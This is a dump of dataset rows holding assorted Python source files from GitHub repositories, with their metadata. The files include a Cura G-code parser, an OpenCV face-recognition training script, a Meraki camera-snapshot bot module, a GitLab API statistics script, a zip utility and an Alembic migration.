blob_id (string, 40) | directory_id (string, 40) | path (string, 2–616) | content_id (string, 40) | detected_licenses (list, 0–69) | license_type (2 classes) | repo_name (string, 5–118) | snapshot_id (string, 40) | revision_id (string, 40) | branch_name (string, 4–63) | visit_date (timestamp[us]) | revision_date (timestamp[us]) | committer_date (timestamp[us]) | github_id (int64, 2.91k–686M, nullable) | star_events_count (int64, 0–209k) | fork_events_count (int64, 0–110k) | gha_license_id (23 classes) | gha_event_created_at (timestamp[us]) | gha_created_at (timestamp[us]) | gha_language (213 classes) | src_encoding (30 classes) | language (1 class) | is_vendor (bool) | is_generated (bool) | length_bytes (int64, 2–10.3M) | extension (246 classes) | content (string, 2–10.3M) | authors (list, 1) | author_id (string, 0–212)
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
17b2acb4b4f0a5b2fb15b6f6cb0c5a4b028b87ae
|
13b8e4ccdf73c741fbe0522ffb648eee89b9a3ad
|
/modifiers/trans.py
|
64bbd0fd6cb1ce7306ca21b7fcd101179fa3d4a3
|
[] |
no_license
|
cyborgizator/pyced
|
6c5111ee2e1acdc1c09cca736cd57056aa5fcc0e
|
6f828fefb6a44f25f1d9a3a10ea69d37c6e81050
|
refs/heads/master
| 2021-01-17T15:30:22.756153
| 2016-03-27T20:43:03
| 2016-03-27T20:43:03
| 8,270,592
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 243
|
py
|
__author__ = 'Alexey Bright'

from modifiers.modifier import Modifier


class Trans(Modifier):
    """ Represents trans-bond """

    names = {'trans'}

    def apply(self):
        """ Applies modifier to the molecular graph """
        pass
|
[
"cyborgizator@gmail.com"
] |
cyborgizator@gmail.com
|
8f0b720310ac0d2db3f03f90e334dc1fc3f57a2c
|
57a01e30fe44b5778a2da5c38da5fd6383162da5
|
/src/com/framework/utils/fileutils/ZipUtil.py
|
c48ef9bd1342e06fe391f4c81336c632577cbcdc
|
[
"Apache-2.0"
] |
permissive
|
chen5669/AppiumTestProject
|
b7577a8791dafa03581c5a0c93bce006e6a71a50
|
9ce7a552532193e8571c99148e452804b60e26d3
|
refs/heads/master
| 2021-09-01T12:38:12.314489
| 2017-12-27T02:15:20
| 2017-12-27T02:15:20
| 115,418,225
| 1
| 0
| null | 2017-12-27T02:15:21
| 2017-12-26T11:57:31
|
Python
|
UTF-8
|
Python
| false
| false
| 1,424
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@version: python2.7
@author: 'jayzhen'
@contact: jayzhen_testing@163.com
@site: https://github.com/gitjayzhen
@software: PyCharm Community Edition
@time: 2017/3/29 13:12
"""
import os
import zipfile  # stdlib module; the original `import ZipUtil` imported this file itself


# Extract a zip archive
def unzip():
    source_zip = "c:\\update\\SW_Servers_20120815.zip"
    target_dir = "c:\\update\\"
    myzip = zipfile.ZipFile(source_zip)
    myfilelist = myzip.namelist()
    for name in myfilelist:
        f_handle = open(target_dir + name, "wb")
        f_handle.write(myzip.read(name))
        f_handle.close()
    myzip.close()


# Add a file to an existing zip archive
def addzip(currentfolder, ready2compression):
    zipfname = "AutoTesting-Reports.zip"
    absZIPpath = os.path.join(currentfolder, zipfname)
    absfpath = os.path.join(currentfolder, ready2compression)
    f = zipfile.ZipFile(absZIPpath, 'w', zipfile.ZIP_DEFLATED)
    f.write(absfpath)
    f.close()
    return absZIPpath, zipfname


# Pack every file under a directory tree into one archive
def adddirfile():
    f = zipfile.ZipFile('archive.zip', 'w', zipfile.ZIP_DEFLATED)
    startdir = "c:\\mydirectory"
    for dirpath, dirnames, filenames in os.walk(startdir):
        for filename in filenames:
            f.write(os.path.join(dirpath, filename))
    f.close()

# latestfpath,fname,currentfolder = FileChecK().get_LatestFile()
# absZIPpath,zipfname = addzip(currentfolder,fname)
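# Example call with hypothetical arguments (a sketch, not part of the original):
# zip_path, zip_name = addzip("c:\\reports", "report.html")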
|
[
"jayzhen_testing@163.com"
] |
jayzhen_testing@163.com
|
56800e9081ae660230ca1cdde52125e003561ae2
|
9a952ad4a7b0fff5a42b7e232e61980dd73f49a7
|
/CuraSlicer/gcodeInterpreter.py
|
9ad0bf2203090f096e84f50c02be7ec524e4c4d9
|
[] |
no_license
|
shoz/CuraSlicer
|
28f333621ae028530d1be92d389b42d895876b21
|
a50206e01920123c745ef24968a0d4dd40f49f3a
|
refs/heads/master
| 2021-01-15T18:58:17.614221
| 2015-06-28T10:32:19
| 2015-06-28T10:32:19
| 37,811,288
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,953
|
py
|
"""
The GCodeInterpreter module generates layer information from GCode.
It does this by parsing the whole GCode file. On large files this can take a while and should be used from a thread.
"""
__copyright__ = "Copyright (C) 2013 David Braam - Released under terms of the AGPLv3 License"
import sys
import math
import os
import time
import numpy
import types
import cStringIO as StringIO
from CuraSlicer import profile
def gcodePath(newType, pathType, layerThickness, startPoint):
"""
Build a gcodePath object. This used to be objects, however, this code is timing sensitive and dictionaries proved to be faster.
"""
if layerThickness <= 0.0:
layerThickness = 0.01
if profile.getProfileSetting('spiralize') == 'True':
layerThickness = profile.getProfileSettingFloat('layer_height')
return {'type': newType,
'pathType': pathType,
'layerThickness': layerThickness,
'points': [startPoint],
'extrusion': [0.0]}
class gcode(object):
"""
The heavy lifting GCode parser. This is most likely the hardest working python code in Cura.
It parses a GCode file and stores the result in layers where each layer has paths that describe the GCode.
"""
def __init__(self):
self.regMatch = {}
self.layerList = None
self.extrusionAmount = 0
self.filename = None
self.progressCallback = None
def load(self, data):
self.filename = None
if type(data) in types.StringTypes and os.path.isfile(data):
self.filename = data
self._fileSize = os.stat(data).st_size
gcodeFile = open(data, 'r')
self._load(gcodeFile)
gcodeFile.close()
elif type(data) is list:
self._load(data)
else:
self._fileSize = len(data)
data.seekStart()
self._load(data)
def calculateWeight(self):
#Calculates the weight of the filament in kg
radius = float(profile.getProfileSetting('filament_diameter')) / 2
volumeM3 = (self.extrusionAmount * (math.pi * radius * radius)) / (1000*1000*1000)
return volumeM3 * profile.getPreferenceFloat('filament_physical_density')
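#Worked example with assumed values (not from this file): extrusionAmount=1000mm
#of 2.85mm filament -> volume = 1000 * pi * 1.425^2 = ~6379 mm^3 = 6.379e-6 m^3;
#at a physical density of 1240 kg/m^3 that is roughly 0.0079 kg (~8 g).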
def calculateCost(self):
cost_kg = profile.getPreferenceFloat('filament_cost_kg')
cost_meter = profile.getPreferenceFloat('filament_cost_meter')
if cost_kg > 0.0 and cost_meter > 0.0:
return "%.2f / %.2f" % (self.calculateWeight() * cost_kg, self.extrusionAmount / 1000 * cost_meter)
elif cost_kg > 0.0:
return "%.2f" % (self.calculateWeight() * cost_kg)
elif cost_meter > 0.0:
return "%.2f" % (self.extrusionAmount / 1000 * cost_meter)
return None
def _load(self, gcodeFile):
self.layerList = []
pos = [0.0,0.0,0.0]
posOffset = [0.0, 0.0, 0.0]
currentE = 0.0
currentExtruder = 0
extrudeAmountMultiply = 1.0
absoluteE = True
scale = 1.0
posAbs = True
feedRate = 3600.0
moveType = 'move'
layerThickness = 0.1
pathType = 'CUSTOM'
currentLayer = []
currentPath = gcodePath('move', pathType, layerThickness, pos)
currentPath['extruder'] = currentExtruder
currentLayer.append(currentPath)
for line in gcodeFile:
if type(line) is tuple:
line = line[0]
#Parse Cura_SF comments
if line.startswith(';TYPE:'):
pathType = line[6:].strip()
if ';' in line:
comment = line[line.find(';')+1:].strip()
#Slic3r GCode comment parser
if comment == 'fill':
pathType = 'FILL'
elif comment == 'perimeter':
pathType = 'WALL-INNER'
elif comment == 'skirt':
pathType = 'SKIRT'
#Cura layer comments.
if comment.startswith('LAYER:'):
currentPath = gcodePath(moveType, pathType, layerThickness, currentPath['points'][-1])
layerThickness = 0.0
currentPath['extruder'] = currentExtruder
for path in currentLayer:
path['points'] = numpy.array(path['points'], numpy.float32)
path['extrusion'] = numpy.array(path['extrusion'], numpy.float32)
self.layerList.append(currentLayer)
if self.progressCallback is not None:
if self.progressCallback(float(gcodeFile.tell()) / float(self._fileSize)):
#Abort the loading, we can safely return as the results here will be discarded
gcodeFile.close()
return
currentLayer = [currentPath]
line = line[0:line.find(';')]
G = getCodeInt(line, 'G')
if G is not None:
if G == 0 or G == 1: #Move
x = getCodeFloat(line, 'X')
y = getCodeFloat(line, 'Y')
z = getCodeFloat(line, 'Z')
e = getCodeFloat(line, 'E')
#f = getCodeFloat(line, 'F')
oldPos = pos
pos = pos[:]
if posAbs:
if x is not None:
pos[0] = x * scale + posOffset[0]
if y is not None:
pos[1] = y * scale + posOffset[1]
if z is not None:
pos[2] = z * scale + posOffset[2]
else:
if x is not None:
pos[0] += x * scale
if y is not None:
pos[1] += y * scale
if z is not None:
pos[2] += z * scale
moveType = 'move'
if e is not None:
if absoluteE and posAbs:
e -= currentE
if e > 0.0:
moveType = 'extrude'
if e < 0.0:
moveType = 'retract'
currentE += e
else:
e = 0.0
if moveType == 'move' and oldPos[2] != pos[2]:
if oldPos[2] > pos[2] and abs(oldPos[2] - pos[2]) > 5.0 and pos[2] < 1.0:
oldPos[2] = 0.0
if layerThickness == 0.0:
layerThickness = abs(oldPos[2] - pos[2])
if currentPath['type'] != moveType or currentPath['pathType'] != pathType:
currentPath = gcodePath(moveType, pathType, layerThickness, currentPath['points'][-1])
currentPath['extruder'] = currentExtruder
currentLayer.append(currentPath)
currentPath['points'].append(pos)
currentPath['extrusion'].append(e * extrudeAmountMultiply)
elif G == 4: #Delay
S = getCodeFloat(line, 'S')
P = getCodeFloat(line, 'P')
elif G == 10: #Retract
currentPath = gcodePath('retract', pathType, layerThickness, currentPath['points'][-1])
currentPath['extruder'] = currentExtruder
currentLayer.append(currentPath)
currentPath['points'].append(currentPath['points'][0])
elif G == 11: #Push back after retract
pass
elif G == 20: #Units are inches
scale = 25.4
elif G == 21: #Units are mm
scale = 1.0
elif G == 28: #Home
x = getCodeFloat(line, 'X')
y = getCodeFloat(line, 'Y')
z = getCodeFloat(line, 'Z')
center = [0.0,0.0,0.0]
if x is None and y is None and z is None:
pos = center
else:
pos = pos[:]
if x is not None:
pos[0] = center[0]
if y is not None:
pos[1] = center[1]
if z is not None:
pos[2] = center[2]
elif G == 90: #Absolute position
posAbs = True
elif G == 91: #Relative position
posAbs = False
elif G == 92:
x = getCodeFloat(line, 'X')
y = getCodeFloat(line, 'Y')
z = getCodeFloat(line, 'Z')
e = getCodeFloat(line, 'E')
if e is not None:
currentE = e
#if x is not None:
# posOffset[0] = pos[0] - x
#if y is not None:
# posOffset[1] = pos[1] - y
#if z is not None:
# posOffset[2] = pos[2] - z
else:
print "Unknown G code:" + str(G)
else:
M = getCodeInt(line, 'M')
if M is not None:
if M == 0: #Message with possible wait (ignored)
pass
elif M == 1: #Message with possible wait (ignored)
pass
elif M == 25: #Stop SD printing
pass
elif M == 80: #Enable power supply
pass
elif M == 81: #Suicide/disable power supply
pass
elif M == 82: #Absolute E
absoluteE = True
elif M == 83: #Relative E
absoluteE = False
elif M == 84: #Disable step drivers
pass
elif M == 92: #Set steps per unit
pass
elif M == 101: #Enable extruder
pass
elif M == 103: #Disable extruder
pass
elif M == 104: #Set temperature, no wait
pass
elif M == 105: #Get temperature
pass
elif M == 106: #Enable fan
pass
elif M == 107: #Disable fan
pass
elif M == 108: #Extruder RPM (these should not be in the final GCode, but they are)
pass
elif M == 109: #Set temperature, wait
pass
elif M == 110: #Reset N counter
pass
elif M == 113: #Extruder PWM (these should not be in the final GCode, but they are)
pass
elif M == 117: #LCD message
pass
elif M == 140: #Set bed temperature
pass
elif M == 190: #Set bed temperature & wait
pass
elif M == 221: #Extrude amount multiplier
s = getCodeFloat(line, 'S')
if s is not None:
extrudeAmountMultiply = s / 100.0
else:
print "Unknown M code:" + str(M)
else:
T = getCodeInt(line, 'T')
if T is not None:
if currentExtruder > 0:
posOffset[0] -= profile.getMachineSettingFloat('extruder_offset_x%d' % (currentExtruder))
posOffset[1] -= profile.getMachineSettingFloat('extruder_offset_y%d' % (currentExtruder))
currentExtruder = T
if currentExtruder > 0:
posOffset[0] += profile.getMachineSettingFloat('extruder_offset_x%d' % (currentExtruder))
posOffset[1] += profile.getMachineSettingFloat('extruder_offset_y%d' % (currentExtruder))
for path in currentLayer:
path['points'] = numpy.array(path['points'], numpy.float32)
path['extrusion'] = numpy.array(path['extrusion'], numpy.float32)
self.layerList.append(currentLayer)
if self.progressCallback is not None and self._fileSize > 0:
self.progressCallback(float(gcodeFile.tell()) / float(self._fileSize))
def getCodeInt(line, code):
n = line.find(code) + 1
if n < 1:
return None
m = line.find(' ', n)
try:
if m < 0:
return int(line[n:])
return int(line[n:m])
except:
return None
def getCodeFloat(line, code):
n = line.find(code) + 1
if n < 1:
return None
m = line.find(' ', n)
try:
if m < 0:
return float(line[n:])
return float(line[n:m])
except:
return None
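#Example of the two word parsers above: for line = "G1 X10.5 E2",
#getCodeInt(line, 'G') returns 1 and getCodeFloat(line, 'X') returns 10.5.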
if __name__ == '__main__':
t = time.time()
for filename in sys.argv[1:]:
g = gcode()
g.load(filename)
print time.time() - t
|
[
"shoji.ihara@gmail.com"
] |
shoji.ihara@gmail.com
|
500999b64b846913ee8eafb72d301d9641950d71
|
022fdec163db36b9dd3877ed4f27c1d85c094596
|
/src/pip/__init__.py
|
75df0357626461609395d037c9de004d53662bb2
|
[
"MIT"
] |
permissive
|
cade335/pip
|
d10cd892c43539fbf9ff12eac5cffdb3bfda5947
|
ddfa401dae5cdc473772f93951be2715e852681a
|
refs/heads/master
| 2020-06-17T10:52:53.480599
| 2019-07-08T20:19:43
| 2019-07-08T20:19:43
| 195,902,067
| 1
| 0
|
MIT
| 2019-07-09T00:06:31
| 2019-07-09T00:06:30
| null |
UTF-8
|
Python
| false
| false
| 26
|
py
|
__version__ = "19.2.dev0"
|
[
"pradyunsg@gmail.com"
] |
pradyunsg@gmail.com
|
d474dc02fac9022280b7a674320f1a354a499e68
|
69a199830b2d6c99b2bb8a3007a001c363d80e4f
|
/5_训练数据.py
|
6983ba0f99e2281418cae2d188ce5654bab655d6
|
[] |
no_license
|
IronSpiderMan/FaceDetector
|
0285d0835061d31b78252ccf87cddac962e6dc84
|
ba658a0e8f38eeb02a97b17bb30ce79dd309f245
|
refs/heads/master
| 2020-12-15T12:24:59.578002
| 2020-01-20T13:03:29
| 2020-01-20T13:03:29
| 235,101,451
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,060
|
py
|
import cv2
import os
import numpy

# Root directory of the face images
root = './face/'


def getFacesAndLabels():
    # Holds the face image data
    faces = []
    # Holds the label data
    labels = []
    # Load the face detector
    face_detector = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
    # List the image files
    files = os.listdir(root)
    for file in files:
        # Read the image
        im = cv2.imread(root + file)
        # Convert to grayscale
        grey = cv2.cvtColor(im, cv2.COLOR_BGR2GRAY)
        # Detect faces
        face = face_detector.detectMultiScale(grey)
        for x, y, w, h in face:
            # The label is the leading number in the file name
            labels.append(int(file.split('.')[0]))
            # Crop out the face region
            faces.append(grey[y:y+h, x:x+w])
    return faces, labels


# Collect the face data and labels
faces, labels = getFacesAndLabels()
# Create the LBPH recognizer
recognizer = cv2.face.LBPHFaceRecognizer_create()
# Train on the data
recognizer.train(faces, numpy.array(labels))
# Save the trained model
recognizer.write('./trainer.yml')
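# The saved model can later be reloaded for prediction (sketch; `grey_face`
# is a hypothetical cropped grayscale face image):
# recognizer.read('./trainer.yml')
# label, confidence = recognizer.predict(grey_face)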
|
[
"sockwz@163.com"
] |
sockwz@163.com
|
7f5649092f26f5102c6fa6dd446e1d3a8c4f6537
|
6f594cbe55ea146de86b0f82d4b4bd2cc716eb11
|
/migrations/versions/6451c45cc96d_.py
|
8134fd6c58f803c1666b1397dc7f2f8d5b48660b
|
[
"BSD-3-Clause"
] |
permissive
|
Rdbaker/WPI-IFC
|
428d4c8ae422e50364ca0b80aa7f410641c8bb03
|
23b39d57d8ab62bb0588590010a43bfbdaea2b36
|
refs/heads/master
| 2021-01-10T16:12:01.558306
| 2018-02-06T01:07:55
| 2018-02-06T01:07:55
| 54,286,220
| 0
| 1
| null | 2016-12-23T05:03:40
| 2016-03-19T20:40:26
|
Python
|
UTF-8
|
Python
| false
| false
| 1,075
|
py
|
"""Add parties references to the 'users' and 'fraternities'
Revision ID: 6451c45cc96d
Revises: e2200226cabc
Create Date: 2016-04-15 19:15:32.280974
"""
# revision identifiers, used by Alembic.
revision = '6451c45cc96d'
down_revision = 'e2200226cabc'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('parties', sa.Column('creator_id', sa.Integer(), nullable=False))
op.add_column('parties', sa.Column('fraternity_id', sa.Integer(), nullable=False))
op.create_foreign_key(None, 'parties', 'users', ['creator_id'], ['id'])
op.create_foreign_key(None, 'parties', 'fraternities', ['fraternity_id'], ['id'])
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_constraint(None, 'parties', type_='foreignkey')
op.drop_constraint(None, 'parties', type_='foreignkey')
op.drop_column('parties', 'fraternity_id')
op.drop_column('parties', 'creator_id')
### end Alembic commands ###
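# Typical usage with the Alembic CLI (assuming the project's usual setup):
#   alembic upgrade 6451c45cc96d
#   alembic downgrade e2200226cabc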
|
[
"ryan.da.baker@gmail.com"
] |
ryan.da.baker@gmail.com
|
71464f9990bdf5bbe65c7df13109d356523a17e2
|
8e92aa8428a9c4321d98852a19b52fb0eec07850
|
/python/abc/abc215/abc215d.py
|
0fcd849683e13b4a329faccda071fe051b5db3d7
|
[] |
no_license
|
t-chov/algorithm_and_data_structure
|
ad71a4aa7a85698081fc428566125d8adff6463b
|
e1dab899e76539fda7e5271b8f6b1927b82e152a
|
refs/heads/main
| 2023-08-17T01:33:53.355280
| 2021-09-12T07:15:46
| 2021-09-12T07:15:46
| 373,989,937
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 792
|
py
|
from math import sqrt


def prime_factorize(n: int):
    """Prime factorization: return a list of (prime, exponent) pairs."""
    s = int(sqrt(n))
    r = 0
    primes = []
    for i in range(2, s + 1):
        if n % i == 0:
            r = 0
            while n % i == 0:
                r += 1
                n = n // i
            primes.append((i, r))
    if n > s:
        primes.append((n, 1))
    return primes
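# Quick sanity check of the helper above (example values are mine, not the author's):
# prime_factorize(12) == [(2, 2), (3, 1)]; prime_factorize(13) == [(13, 1)]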
N, M = map(int, input().split())
k = {i: True for i in range(1, M + 1)}
A = set(map(int, input().split()))
memo = set()
for a in A:
    primes = prime_factorize(a)
    for p in primes:
        pp = p[0]
        if pp in memo:
            continue
        memo.add(pp)
        for i in range(1, M // pp + 1):
            k[pp * i] = False
ans = [i for i in k.keys() if k[i]]
print(len(ans))
for a in ans:
    print(a)
|
[
"kotsuyuki@gmail.com"
] |
kotsuyuki@gmail.com
|
852f3ca9df527b3b9480c1a93e71c8d44bf424fa
|
c3d348e5d3a85034afc360a617a88b803f1067fa
|
/python/a.py
|
c5b75bfb0c7b62ee26f06e0f803df41c8ebd6a51
|
[] |
no_license
|
Gupta-Akshit/Firsttime
|
d5be966ff0a97abdd8c3baa2b1c167368e207c11
|
509009aa727a7bc3182aaa9d81548d815bf661d5
|
refs/heads/master
| 2021-05-02T10:36:44.066565
| 2018-02-08T13:21:09
| 2018-02-08T13:21:09
| 120,760,238
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 22
|
py
|
print("hello People")
|
[
"akshit.gupta.cool@gmail.com"
] |
akshit.gupta.cool@gmail.com
|
1473ee68499fd09e1f265bb3e9d73d5ae37b9718
|
09c3d83aa8aa0c05af518b2131800f45d3255541
|
/snapshot.py
|
3ea8b29456685779365c2108655636d1801449b3
|
[
"MIT"
] |
permissive
|
receronp/meraki_bot
|
9cfcbc252f766eeb41755d555c5fc1596dbb1e17
|
9c7a9379184a18961309b9ed1b13a8031e5a290d
|
refs/heads/main
| 2023-08-27T18:50:10.504515
| 2021-10-29T22:27:15
| 2021-10-29T22:27:15
| 422,692,134
| 0
| 0
| null | 2021-10-29T22:27:16
| 2021-10-29T19:31:43
|
Python
|
UTF-8
|
Python
| false
| false
| 7,915
|
py
|
from datetime import datetime
import pytz
import requests
from chatbot import *
from status import *
# List the devices in an organization
# https://api.meraki.com/api_docs#list-the-devices-in-an-organization
def get_org_devices(session, api_key, org_id):
headers = {'X-Cisco-Meraki-API-Key': api_key, 'Content-Type': 'application/json'}
response = session.get(f'https://api.meraki.com/api/v0/organizations/{org_id}/devices', headers=headers)
return response.json()
# Returns video link to the specified camera. If a timestamp is supplied, it links to that timestamp.
# https://api.meraki.com/api_docs#returns-video-link-to-the-specified-camera
def get_video_link(api_key, net_id, serial, timestamp=None, session=None):
headers = {'X-Cisco-Meraki-API-Key': api_key, 'Content-Type': 'application/json'}
if not session:
session = requests.Session()
if timestamp:
response = session.get(
f'https://api.meraki.com/api/v0/networks/{net_id}/cameras/{serial}/videoLink?timestamp={timestamp}',
headers=headers
)
else:
response = session.get(
f'https://api.meraki.com/api/v0/networks/{net_id}/cameras/{serial}/videoLink',
headers=headers
)
if response.ok:
video_link = response.json()['url']
return video_link
else:
return None
# Generate a snapshot of what the camera sees at the specified time and return a link to that image.
# https://api.meraki.com/api_docs#generate-a-snapshot-of-what-the-camera-sees-at-the-specified-time-and-return-a-link-to-that-image
def generate_snapshot(api_key, net_id, serial, timestamp=None, session=None):
headers = {'X-Cisco-Meraki-API-Key': api_key, 'Content-Type': 'application/json'}
if not session:
session = requests.Session()
if timestamp:
response = session.post(
f'https://api.meraki.com/api/v0/networks/{net_id}/cameras/{serial}/snapshot',
headers=headers,
json={'timestamp': timestamp}
)
else:
response = session.post(
f'https://api.meraki.com/api/v0/networks/{net_id}/cameras/{serial}/snapshot',
headers=headers
)
if response.ok:
snapshot_link = response.json()['url']
return snapshot_link
else:
return None
# List the devices in a network
# https://api.meraki.com/api_docs#list-the-devices-in-a-network
def get_network_devices(api_key, net_id, session=None):
headers = {'X-Cisco-Meraki-API-Key': api_key, 'Content-Type': 'application/json'}
if not session:
session = requests.Session()
response = session.get(
f'https://api.meraki.com/api/v0/networks/{net_id}/devices',
headers=headers
)
if response.ok:
return response.json()
else:
return None
# Return a network
# https://api.meraki.com/api_docs#return-a-network
def get_network(api_key, net_id, session=None):
headers = {'X-Cisco-Meraki-API-Key': api_key, 'Content-Type': 'application/json'}
if not session:
session = requests.Session()
response = session.get(
f'https://api.meraki.com/api/v0/networks/{net_id}',
headers=headers
)
if response.ok:
return response.json()
else:
return None
# Retrieve cameras' snapshots, links to video, and timestamps in local time zone
def meraki_snapshots(session, api_key, timestamp=None, cameras=None):
# Temporarily store mappings of networks to their time zones
network_times = {}
# Assemble return data
snapshots = []
for camera in cameras:
net_id = camera['networkId']
serial = camera['serial']
cam_name = camera['name'] if 'name' in camera and camera['name'] else serial
# Get time zone
if net_id not in network_times:
time_zone = get_network(api_key, net_id, session)['timeZone']
network_times[net_id] = time_zone
else:
time_zone = network_times[net_id]
# Get video link
video_link = get_video_link(api_key, net_id, serial, timestamp, session)
# Get snapshot link
snapshot_link = generate_snapshot(api_key, net_id, serial, timestamp, session)
# Add timestamp to file name
if not timestamp:
utc_now = pytz.utc.localize(datetime.utcnow())
local_now = utc_now.astimezone(pytz.timezone(time_zone))
file_name = cam_name + ' - ' + local_now.strftime('%Y-%m-%d_%H-%M-%S')
else:
file_name = cam_name
# Add to list of snapshots to send
snapshots.append((cam_name, file_name, snapshot_link, video_link))
return snapshots
# Determine whether to retrieve all cameras or just selected snapshots
def return_snapshots(session, headers, payload, api_key, org_id, message, labels):
try:
# Get org's devices
devices = get_org_devices(session, api_key, org_id)
cameras = [d for d in devices if d['model'][:2] == 'MV']
statuses = get_device_statuses(session, api_key, org_id)
online = [d['serial'] for d in statuses if d['status'] == 'online']
# All cameras in the org that are online
if message_contains(message, ['all', 'complete', 'entire', 'every', 'full']) or not labels:
post_message(session, headers, payload,
'📸 _Retrieving all cameras\' snapshots..._')
online_cams = []
for c in cameras:
if c['serial'] in online:
online_cams.append(c)
snapshots = meraki_snapshots(session, api_key, None, online_cams)
# Or just specified/filtered ones, skipping those that do not match filtered names/tags
elif message_contains(message, ['net']):
post_message(session, headers, payload,
'📷 _Retrieving camera snapshots..._')
filtered_cams = []
for c in cameras:
if 'name' in c and c['name'] in labels:
filtered_cams.append(c)
elif 'tags' in c and set(labels).intersection(c['tags'].split()):
filtered_cams.append(c)
snapshots = meraki_snapshots(session, api_key, None, filtered_cams)
else:
post_message(session, headers, payload,
'📷 _Retrieving camera snapshot..._')
cam = []
for c in cameras:
if 'name' in c and c['name'] in labels:
if message_contains(message, [c['name'].lower()]):
cam.append(c)
break
snapshots = meraki_snapshots(session, api_key, None, cam)
# Send cameras names with files (URLs)
for (cam_name, file_name, snapshot, video) in snapshots:
if snapshot:
temp_file = download_file(session, file_name, snapshot)
if temp_file:
# Send snapshot without analysis
send_file(session, headers, payload, f'[{cam_name}]({video})', temp_file, file_type='image/jpg')
# Send to computer vision API for analysis
pass
# Snapshot GET with URL did not return any image
else:
post_message(session, headers, payload,
f'GET error with retrieving snapshot for camera **{cam_name}**')
else:
# Snapshot POST was not successful in retrieving image URL
post_message(session, headers, payload,
f'POST error with requesting snapshot for camera **{cam_name}**')
except Exception:
post_message(session, headers, payload,
'Does your API key have write access to the specified organization ID with cameras? 😳')
|
[
"receronp@gmail.com"
] |
receronp@gmail.com
|
d2f4d7328e9ba27c70e90e4189dccf707b288262
|
4d1a392efa56da53bc9d35946afca3f93b574deb
|
/GetGitlabDetails.py
|
ed94d126606cbc366c493f23e9ece2b7bdcee2eb
|
[] |
no_license
|
vikramuk/PythonScripts
|
aa0f819ef3b8d6de7f9be6866d806c0496a2d00a
|
96d6fe661b02da7c1f4a5e9b6ddaa76d540e910b
|
refs/heads/master
| 2020-04-11T12:24:07.479525
| 2019-08-16T09:54:54
| 2019-08-16T09:54:54
| 161,778,845
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,883
|
py
|
import gitlab, os, sys
import logging
import requests, json, time, urllib
from requests.models import PreparedRequest
# https://stackoverflow.com/questions/2506379/add-params-to-given-url-in-python

# GitLab expects this header to be spelled 'PRIVATE-TOKEN' (hyphen, not underscore)
headers = {
    'PRIVATE-TOKEN': '',
}
param2 = (
    ('private_token', ''),
    ('statistics', 'true'),
)


def GetDetails(projectid):
    prjID = projectid  # .rstrip('\n')
    getProjectStatistics(prjID)
    getProjectBranches(prjID)
    getProjectCommits(prjID)


def getProjectBranches(prjID):
    # print("Am in Branch")
    URL = 'https://gitlab.com/api/v4/projects/' + prjID + '/repository/branches'
    r = requests.get(URL, headers=headers)
    # print(URL)
    data = r.json()
    if r.status_code == 200:
        data = r.json()
        print(data[0]['name'], data[0]['commit']['id'])
        for branches in data:
            BranchName = branches['name']
            BranchID = branches['commit']['short_id']
            CommitterEmail = branches['commit']['committer_email']
            print("BranchName:%s\t BranchID:%s\t BranchCommitter:%s " % (BranchName, BranchID, CommitterEmail))


def getProjectCommits(prjID):
    # print("Am in Commits")
    URL = 'https://gitlab.com/api/v4/projects/' + prjID + '/repository/commits'
    r = requests.get(URL, headers=headers)
    data = r.json()
    if r.status_code == 200:
        CommitID = data[0]['id']
        shortID = data[0]['short_id']
        Commiter = data[0]['committer_name']
        print("CommitName:%s\t CommitID:%s\t Commiter:%s \n" % (CommitID, shortID, Commiter))
        for commit in data:
            commmitName = commit['id']
            commitID = commit['short_id']
            CommitterEmail = commit['committer_email']
            print("CommitName:%s\t CommitID:%s\t CommitCommitter:%s " % (commmitName, commitID, CommitterEmail))


def getProjectStatistics(prjID):
    # print("Am in Statistics")
    URL = 'https://gitlab.com/api/v4/projects/' + prjID
    r = requests.get(URL, params=param2)
    data = r.json()
    if r.status_code == 200:
        data = r.json()
        ProjectID = prjID
        ProjectName = data['name']
        ProjectNameSpace = data['name_with_namespace']
        DefBranch = data['default_branch']
        SSHRepo = data['ssh_url_to_repo']
        IssueCount = data['open_issues_count']
        CommitCount = data['statistics']['commit_count']
        Filesize = data['statistics']['storage_size']
        Reposize = data['statistics']['repository_size']
        print("ProjectID: %s \t ProjectName %s \t ProjectNameSpace %s \t DefBranch %s \t SSHRepo %s \t IssueCount:%s \t Commits:%s \t FileSize:%s\t RepoSize:%s \n" % (ProjectID, ProjectName, ProjectNameSpace, DefBranch, SSHRepo, IssueCount, CommitCount, Filesize, Reposize))


def GetProjectDetails():
    try:
        # One `with` block is enough; the original also opened the file a
        # second time without ever closing it.
        with open("C:\\Users\\vikram.uk\\Desktop\\ProjectList.txt") as f:
            content = f.read().splitlines()
        # print(content)
    except IOError:
        print("List of Projects is Empty")
        sys.exit(1)
    for projectid in content:
        GetDetails(projectid)
        # print(projectid)


if __name__ == "__main__":
    GetProjectDetails()
|
[
"noreply@github.com"
] |
vikramuk.noreply@github.com
|
287079129a1d83cbb891aa1cfbcf0a2daf0564f8
|
07d71b9664f4cac4841455c9a5966cbc66b87ae9
|
/construction/wizard/__init__.py
|
954ce0e6246bfbb23bf83a01b132f5c6a1bbc827
|
[] |
no_license
|
benoitlavorata/egy-pt-ext
|
16bff0aed96722fc0b303581f9454b4f3be08383
|
f07913cf1180e6f4bb336276dfea7d6856a2ca4b
|
refs/heads/master
| 2023-02-04T09:04:16.288987
| 2020-12-25T20:57:50
| 2020-12-25T20:57:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 125
|
py
|
# -*- coding: utf-8 -*-
from . import project_user_subtask
from . import task_costing_invoice
from . import whatsapp_wizard
|
[
"ah.amen79@gmail.com"
] |
ah.amen79@gmail.com
|
